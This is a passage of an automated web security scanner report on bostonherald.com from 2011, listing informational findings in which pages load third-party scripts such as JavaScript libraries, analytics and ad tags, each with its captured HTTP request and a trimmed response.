http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/worcester/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.717. http://www.bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

18.718. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.719. http://www.bostonherald.com/shopping/half_price_boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/shopping/half_price_boston/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://edge.quantserve.com/quant.js

Request

GET /shopping/half_price_boston/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.720. http://www.bostonherald.com/sports/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /sports/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 113792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.721. http://www.bostonherald.com/sports/baseball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/baseball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js

Request

GET /sports/baseball/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.722. http://www.bostonherald.com/sports/basketball/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cdn.cinesport.com/container.js
http://edge.quantserve.com/quant.js
http://www.sportsnetwork.com/aspdata/clients/herald/nbaministandings.aspx?id=092
http://www.sportsnetwork.com/aspdata/clients/herald/nbaschedule.aspx?id=092
http://www.sportsnetwork.com/aspdata/clients/herald/nbateamleaders.aspx?id=092

Request

GET /sports/basketball/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:57:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 74472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaschedule.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbaministandings.aspx?id=092"></script>
...[SNIP]...
<div style="padding:5px; border-top:solid 1px #ddd;border-left:solid 1px #ddd;border-right:solid 1px #ddd;">
<script LANGUAGE="JavaScript" SRC="http://www.sportsnetwork.com/aspdata/clients/herald/nbateamleaders.aspx?id=092"></script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.723. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://cdn.cinesport.com/container.js
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div style="margin-bottom: 10px; margin-left: 8px;">
<script type="text/javascript" src="http://cdn.cinesport.com/container.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.724. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://cdn.cinesport.com/container.js
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
